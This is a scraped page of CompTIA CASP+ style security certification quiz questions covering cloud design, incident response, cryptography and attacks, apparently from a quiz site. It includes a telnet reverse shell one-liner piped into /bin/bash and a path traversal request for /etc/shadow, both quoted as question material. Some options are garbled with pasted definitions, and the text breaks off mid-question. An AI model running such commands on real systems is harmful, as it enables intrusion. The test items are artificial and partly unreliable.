large number of nodes? A. CAN B. DNP3 C. Modbus D. WiFi E. Zigbee Points: 0/1 25. A digital forensics expert has obtained an ARM binary suspected of including malicious behavior. The expert would like to trace and analyze the ARM binary's execution. Which of the following tools would best support this effort? A. FTK Imager B. objdump C. Ghidra D. OllyDbg Close Retake Quiz Review Answers Points: 0/1 1. In preparation for the holiday season, a company redesigned the system that manages retail sales and moved it to a cloud service provider. The new infrastructure didnot meet the company’s availability requirements. During a postmortem analysis, the following issues were highlighted: International users reported latency when images on the web page were initially loading During times of report processing, users reported issues with inventory when attempting to place orders Despite the fact that ten new API servers were added, the load across servers was heavy at peak times Which of the following infrastructure design changes would be best for the organization to implement to avoid these issues in the future? A. Serve static content via distributed CDNs, create a read replica of the central database and pull reports from there, and autoscale API servers based on performance B. Server static content object storage across different regions, increase size on the managed relational database, and distribute the ten API servers across multiple regions C. Serve images from an object storage bucket with infrequent read times, replicate the database across different regions, and dynamically create API servers based on load D. Increase the bandwidth for the server that delivers images, use a CDN, change the database to non- relational database, and split the ten API servers across two load balancers Points: 0/1 2. Due to budget constraints, an organization created a policy that only permits vulnerabilities rated high and critical according to CVSS to be fixed or mitigated. A security analyst notices that many vulnerabilities that were previously scored as medium are now breaching higher thresholds. Upon further investigation, the analyst notices certain ratings are not aligned with the approved system categorization. Which of the following can the analyst do to get a better picture of the risk while adhering to the organization’s policy? A. Align the attack vectors to the predetermined system categorization B. Align the exploitability metrics to the predetermined system categorization C. Align the remediation levels to the predetermined system categorization D. Align the impact subscore requirements to the predetermined system categorization Points: 0/1 3. A DevOps team has deployed databases, event-driven services, and an API gateway as a PaaS solution that will support a new billing system. Which of the following security responsibilities will the DevOps team need to perform? A. Securely configure the authentication mechanisms B. Upgrade the service as part of the life-cycle management C. Execute port scanning against the services D. Patch the infrastructure at the OS Points: 0/1 4. In comparison to other types of alternative processing sites that may be invoked as part of a disaster recovery, cold sites are different because they: A. are the quickest way to restore business B. are geographically separated from the company's primary facility C. provide workstations and read-only domain controllers D. have basic utility coverage, including power and water E. are generally the least costly to sustain Points: 0/1 5. A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company’s CFO loses a phone multiple times a year. Which of the following will most likely secure the data on the lost device? A. Remotely wipe the device B. Set up different profiles based on the persons risk C. Require a VPN to be active to access company data D. Require MFA to access company applications Points: 0/1 6. A security engineer is evaluating a low-cost method to detect ransomware attacks. The security engineer needs a way to detect when a ransomware attack is able to access certain files located on a file server. Which of the following options best fits the security engineer’s needs? A. Installing open-source HIPS on the file server B. Installing an open-source sandbox C. Moving the file server behind an open-source IPS engine D. Implementing decoy files using open-source tools Points: 0/1 7. A company wants to harden its network infrastructure and has established the following requirements for its physical network devices: Active Directory authentication and authorization should be attempted first, but local authentication and authorization is permitted if Active Directory fails or is unavailable. An event-based authentication factor must be used. Administrative actions must be logged. Which of the following should the company implement to meet the requirements? (Select TWO) A. HOTP B. EAP C. TOTP D. SSH E. TACACS+ F. RADIUS Points: 0/1 8. In order to save money, a company has moved its data to the cloud with a low cost provider. The company did not perform a security review prior to the move; however, the company requires all of its data stored within the country where the headquarters is located. A new employee on the security team has been asked to evaluate the current provider against the most important requirements. The current cloud provider that the company is using offers: Only multi-tenant cloud hosting Minimal physical security Few access controls No access to the data center The following information has been uncovered: The company is located in a known floodplain, which flooded last year Government regulations require data to be stored within the country Which of the following should be addressed first? A. Establish a new MOU with the cloud provider B. Update the DRP to account for natural disasters C. Establish a new SLA with the cloud provider D. Provision services according to the appropriate legal requirements Points: 0/1 9. A network admin who manages a Linux web server notices the following traffic: http://comptia.org/../../../../etc/shadow Which of the following is the best action for the network admin to take to defend against this type of web attack? A. Validate the server input and append the input to the base directory path B. Validate the server certificate and trust chain C. Validate that MFA is enabled on the server for all user accounts D. Validate that the server is not deployed with default account credentials Points: 0/1 10. A security analyst sees that a hacker has discovered some keys and they are being made available on a public website. The security analyst is then able to successfully decrypt the data using the keys from the website. Which of the following should the security analyst recommend to protect the affected data? A. Key revocation B. Key rotation C. Zeroization D. Key escrow E. Cryptographic obfuscation Points: 0/1 11. A security architect is working with a new customer to find a vulnerability assessment solution that meets the following requirements: Fast scanning The least false positives possible Signature based A low impact on servers when performing a scan In addition, the customer has several screened subnets, VLANs, and branch offices. Which of the following will best meet the customer’s needs? A. Unauthenticated scanning B. Passive scanning C. Authenticated scanning D. Agent-based scanning Points: 0/1 12. A multinational organization was hacked, and the incident response team's timely action prevented a major disaster. Following the event, the team created an after action report. Which of the following is the primary goal of an after action review? A. To gather evidence for subsequent legal action B. To determine the identity of the attacker C. To identify ways to improve the response process D. To create a plan of action and milestones Points: 0/1 13. Which of the following is used to assess compliance with internal and external requirements? A. RACI matrix B. Audit report C. BCP D. After-action report E. A RACI matrix is a simple, effective means for defining project roles and responsibilities, providing a comprehensive chart of who is responsible, accountable, consulted, and informed every step of the way. Points: 0/1 14. A law firm experienced a breach in which access was gained to a secure server. During an investigation to determine how the breach occurred, an employee admitted to clicking on a spear-phishing link. A security analyst reviewed the event logs and found the following: PAM had not been bypassed DLP did not trigger any alerts The antivirus was updated to the most current signature Which of the following most likely occurred? A. Exfiltration B. Privelege escalation C. Lateral movement D. Exploitation Points: 0/1 15. A bank is working with a security architect to find the best solution to detect database management system compromises. The solution should meet the following requirements: Work at the application layer Send alerts on attacks from both privileged and malicious users Have a very low false positive Which of the following should the architect recommend? A. FIM B. WAF C. NIPS D. UTM E. DAM F. Database Activity Monitoring A DAM solution is a security tool that monitors and analyzes database activity for signs of compromise or malicious activity. It is designed to work at the application layer and can send alerts on attacks from both privileged and malicious users. A DAM solution can also have a very low false positive rate, making it an effective tool for detecting database management system compromises. Points: 0/1 16. A security architect is implementing a web application that uses a database back end. Prior to production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks. Which of the following sources could the architect consult to address this security concern? A. OWASP B. OVAL C. IEEE D. SDLC OVAL® International in scope and free for public use, OVAL is an information security community effort to standardize how to assess and report upon the machine state of computer systems. OVAL includes a language to encode system details, and an assortment of content repositories held throughout the community. Tools and services that use OVAL for the three steps of system assessment — representing system information, expressing specific machine states, and reporting the results of an assessment — provide enterprises with accurate, consistent, and actionable information so they may improve their security. Use of OVAL also provides for reliable and reproducible information assurance metrics and enables interoperability and automation among security tools and services. IEEE With an active portfolio of nearly 1,300 standards and projects under development, IEEE is a leading developer of industry standards in a broad range of technologies that drive the functionality, capabilities, and interoperability of products and services, transforming how people live, work, and communicate. Points: 0/1 17. A product manager at a new company needs to ensure the development team produces high quality code on time. The manager has decided to implement an agile development approach instead of waterfall. Which of the following are reasons to choose an agile development approach? (Chose two) A. Budgeting and creating a timeline for the entire project is often more straightforward using an agile approach rather than waterfall B. The product manager would like to produce code in linear phases C. The product manager gives the developers more autonomy to write quality code prior to deployment D. An agile approach incorporates greater application security in the development process than a waterfall approach does E. The product manager prefers to have code iteratively tested throughout development F. The scope of work is expected to evolve during the lifetime of project development Points: 0/1 18. A security operations center analyst is investigating anomalous activity between a database server and an unknown external IP address and gather the following data: dbadmin last logged in at 7:30am and logged out at 8:05am A persistent TCP/6667 connection to the external address was established at 7:55am. The connection is still alive Other than bytes transferred to keep the connection alive, only a few kb of data transfer every hour since the start of the connection A sample outbound request payload from PCAP showed the ASCII content “JOIN #community” Which of the following is the most likely root cause? A. The dbadmin user is consulting the community for help via Internet Relay Chat B. A botnet Trojan is installed on the database server C. The system has been hijacked for cryptocurrency mining D. A SQLi was used to exfiltrate data from the database server Points: 0/1 19. Users are reporting intermittent access issues with a new cloud application that was recently added to the network. Upon investigation, the security administrator notices the human resources department is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following most likely needs to be done to avoid this in the future? A. Modify the ACLs B. Update the marketing department's browser C. Review the Active Directory D. Reconfigure the WAF Points: 0/1 20. A security administrator sees several hundred entries in a web server security log that are similar to the following: Staten Island, New York, United States was blocked 10 minutes for exceeding the maximum requests per minute at URL https://companysite.net/xmlrpc.php 6/7/2021 10:05:15 AM, IP: 151.205.188.74 Hostname: pool-151.205.188.74-nycmny.isp.net Status: 503 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/90.0.44 Safari/537.36 WHOIS: ISP.net (NET-151-196-0-0-1) 151.196.0.0 - 151.205.255.255 The network source varies, but the URL, status, and user agent remain the same. Which of the following would best protect the web server without blocking legitimate traffic? A. Automate the addition of bot IP addresses into a deny list for the web host B. Script the daily collection of the WHOIS ranges to add to the WAF as a denied ACL C. Replace the file xmlrpc.php with a honeypot to collect further IOCs D. Block every subnet that is identified as having a bot that is a source of the traffic Points: 0/1 21. Which of the following is the most important cloud-specific risk from the CSPs viewpont? A. Insecure data deletion B. CI/CD deployment failure C. Resource exhaustion D. Management plane breach Points: 0/1 22. A security engineer is creating a single CSR for the following web server hostnames: www.int.internal www.company.com home.internal www.internal Which of the following would meet the requirement? A. CN B. SAN C. CA D. CRL E. Issuer Points: 0/1 23. An organization has been leveraging RC4 to protect the confidentiality of a continuous, high-throughput 4k video stream but must upgrade to a more modern cipher. The new cipher must maximize speed, particularly on endpoints without crypto instruction sets or coprocessors. Which of the following is most likely to meet the organization’s requirements? A. Blowfish B. AES-GCM C. AES-CBC D. ECDSA E. ChaCha20 Points: 0/1 24. A company's CISO wants to prevent the company from being the target of ransomware. The company's IT assets need to be protected. Which of the following are the most secure options to address these concerns? (Select THREE) A. Strong authentication B. Application control C. EDR D. NGFW E. IDS F. Host-bast firewall G. Antivirus H. Sandboxing Points: 0/1 25. An employee's device was missing for 96 hours before being reported. The employee call the help desk to ask for another device. Which of the following phases of the incident response cylce needs improvement? A. Resolution B. Investigation C. Containment D. Preparation Close Retake Quiz Review Answers Points: 0/1 1. A CSP, which wants to compete in the market, has been approaching companies in an attempt to gain business. The CSP is able to provide the same uptime as other CSPs at a markedly reduced cost. Which of the following would be the most significant business risk to a company that signs a contract with this CSP? A. Geographic location B. Vendor lock-in C. Control plane breach D. Resource exhaustion Points: 0/1 2. A penetration tester is testing a company’s login form for a web application using a list of known usernames and a common password list. According to a brute-force utility, the pentester needs to provide the tool with the proper headers, POST URL with variable names, and the error string returned with an improper login. Which of the following would best help the tester to gather this information? (Select TWO) A. A tcpdump from the web server B. The logs from the web server C. An HTTP interceptor D. The website certificate viewed via the web browser E. The inspect feature from the web browser F. The view source feature of the web browser Points: 0/1 3. A pentester inputs the following command: telnet 192.168.99.254 343 | /bin/bash | telnet 192.168.99.254 344 This command will allow the pentester to establish a: A. reverse shell B. network pivot C. port mirror D. proxy chain Points: 0/1 4. A company wants to improve its active protection capabilities against unknown and zero-day malware. Which of the following is the most likely secure solution? A. App allow list B. Endpoint log collection C. Sandbox detonation D. HIDS E. NIDS Points: 0/1 5. A security admin needs to implement an X.509 solution for multiple sites within the HR department. This solution would need to secure all subdomains associated with the domain name of the main HR web server. Which of the following would need to be implemented to properly secure the sites and provide easier private key management? A. Certificate revocation list B. Wildcard certificate C. Digital signature D. Certificate pinning E. Registration authority Points: 0/1 6. An organization developed an IRP, Which of the following would be best to assess the effectiveness of the plan? A. Creating a playbook B. Performing a tabletop exercise C. Establishing role succession and call lists D. Requesting a 3rd party review E. Generating a checklist by organizational unit Points: 0/1 7. An organization recently completed a security controls assessment. The results highlighted the following vulnerabilities: Out-of-date definitions Misconfigured OSs An inability to detect active attacks Unimpeded access to critical servers’ USB ports Which of the following will most likely reduce the risks that were identified by the assessment team? A. Create an information security program that addresses user training perform weekly audits of user workstations, and utilize a centralized configuration management program B. Install EDR on endpoints, configure group policy, lock server room doors, and install a camera system with guards watching 24/7 C. Update antivirus definitions, install a NGFW with logging enabled, use USB port lockers, and run SCAP scans weekly D. Implement a vulnerability management program and a SIEM tool with alerting, install a badge system with zones, and restrict privileged access. Points: 0/1 8. Which of the following is a security concern for DNP3? A. Authentication is not allocated B. Free-form messages require support C. It is an open source protocol D. Available function codes are not standardized Points: 0/1 9. A company processes sensitive cardholder information that is stored in an internal production database and accessed by internet-facing web servers. The company’s CISO is concerned with the risks related to sensitive data exposure and wants to implement tokenization of sensitive information at the record level. The company implements a one-to-many mapping of primary credit card numbers to temporary credit card numbers. Which of the following should the CISO consider in a tokenization system? A. Salted hashes B. Data field watermarking C. Single-use translation D. Field tagging Points: 0/1 10. A user in the finace department uses a laptop to store a spreedsheet that contains confidential financial information for the company. Which of the following would be the best way to protect the file while the user travels between locations? (Select TWO) A. Place an ACL on the file to deny access to everyone B. Store the file in the user profile C. Enable access logging on the file D. Place an ACL on the file to only allow access to specified users E. Back up the file to an encrypted flash drive F. Encrypt the laptop with FDE Points: 0/1 11. A forensic investigator started the process of gathering evidence on a laptop in response to an incident. the investigator took a snapshot of the hard drive, copied relevant log files, and then performed a memory dump. Which of the following steps in the process should have occurred first? A. Copy relevant log files B. Clone the disk C. Preserve secure storage D. Collect the most volatile data Points: 0/1 12. A company wants to securely manage the APIs that were developed for its in-house apps. Previous penetration tests revealed that developers were embedding unencrypted passwords in the code. Which of the following can the company do to address this finding? (Select TWO) A. Implement user session logging B. Implement time-based API key management C. Use SOAP instead of restful services D. Implement complex, key-length API key management E. Incorporate a DAST into the DevSecOps process to identify the exposure of secrets F. Enforce MFA on the developers' workstations and production systems Points: 0/1 13. A firewall administrator needs to ensure all traffic across the company network is inspected. The administrator gathers data and finds the following information regarding the typical traffic in the network: Port Protocol Traffic in (bytes) Traffic out (bytes) % of traffic 80 TCP 1,250,482 2,165,482 3.12 443 TCP 58,395,746 75,947,219 91.4 ICMP 334,562 444,119.9 445 TCP 7,658,433 568,234 4.11 123 UDP 54,645 55,181.08 Which of the following is the best solution to ensure the admin can complete the assigned task? A. A full tunnel VPN B. Web content filtering C. SSL/TLS decryption D. An endpoint DLP solution Points: 0/1 14. An organization's senior security architect would like to develope cyberdefensive strategies based on standardized advarsary techniques, tactics, and procedures commonly observed. Which of the following would best support this objective? A. The Diamond Model of Intrusion Analysis B. Cloud sourced intelligence reporting C. OSINT analysis D. Deepfake generation E. MITRE ATT&CK Points: 0/1 15. An analyst received a list of IOCs from a government agency. The attack has the following characteristics: The attack starts with bulk phishing If a user clicks on the link, a dropper is downloaded to the computer Each of the malware samples has unique hashes tied to the user The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use? A. Detonate in a sandbox B. Blocklist the executable C. Deploy a honeypot onto the laptops D. Update the IRP Points: 0/1 16. A security engineer based in Iceland works in an environment requiring an on-premises and cloud based storage solution. The solution should take into consideration the following: The company has sensitive data The company has proprietary data The company has its HQs in Iceland, and the data must always reside in that country Which cloud deployment model should be used? A. Public cloud B. Private cloud C. Community cloud D. Hybrid cloud Points: 0/1 17. A company is designing a new system that must have high security. This new system has the following requirements: Permissions must be assigned based on role Fraud from a single person must be prevented A single entity must not have full access control Which of the following can the company use to meet these requirements? A. Need to know B. Dual responsibility C. Seperation of duties D. Least privilege Points: 0/1 18. A company security engineer arrives at work to face the following scenario: Website defacement Calls from the company president indicating the website needs to be fixed immediately because its damaging the brand A job offer from the company’s competitor A security analyst’s investigative report, based on logs from the past 6 months, describing how lateral movement across the network from various IP addresses originating from a foreign adversary country resulted in exfiltrated data Which of the following threat actors is most likely involved? A. Organized crime B. Competitotr C. APT/Nation state D. Script kiddie Points: 0/1 19. A company has moved its sensitive workloads to the cloud and needs to ensure high availability and resiliency of its web based application. The cloud architecture team was given the following requirements: The app must run at 70% capacity at all times The app must sustain DoS and DDoS attacks Services must recover automatically Which of the following should the cloud architecture team implement? (Select THREE) A. Continuous snapshots B. Encryption C. BCP D. WAF E. Containerization F. Read-only replicas G. Autoscaling H. CDN Points: 0/1 20. When implementing serverless computing, an organization must still account for: A. hardware compatability B. the security of its data C. the underlying computing network infrastructure D. patching the service Points: 0/1 21. A software developer is working on a piece of code required by a new software package. The code should use a protocol to verify the validity of a remote identity. Which of the following should the developer implement in the code? A. CRL B. HSTS C. RSA D. OCSP Points: 0/1 22. An organization has an operational requirement with a specific equipment vendor. The organization is located in the United States, but the vendor is located in another region. Which of the following risks would be most concerning to the organization in the event of equipment failure? A. The organization requires authorized vendor specialists B. Shipping delays could cost the organization money C. Support may not be available during all business hours D. Each region has different regulatory frameworks to follow Points: 0/1 23. A major broadcasting company that requires continuous availability to streaming content needs to be resilient against DDoS attakcs, Which of the following is the most important infrastructure security design element to prevent an outage? A. Scaling horizontally to handle increases in traffic B. Supporting heterogenous architecture C. Ensuring cloud autoscaling is in place D. Leveraging content delivery network across multiple regions Points: 0/1 24. A security assessor identified an internet facing web service API provider that was deemed vulnerable. Execution of testssl provided the following insight: Start 2021-02-02 18:24:59 -->> 192.168.44.61:443 (192.168.44.61)

Use Quizgecko on...
Browser
Browser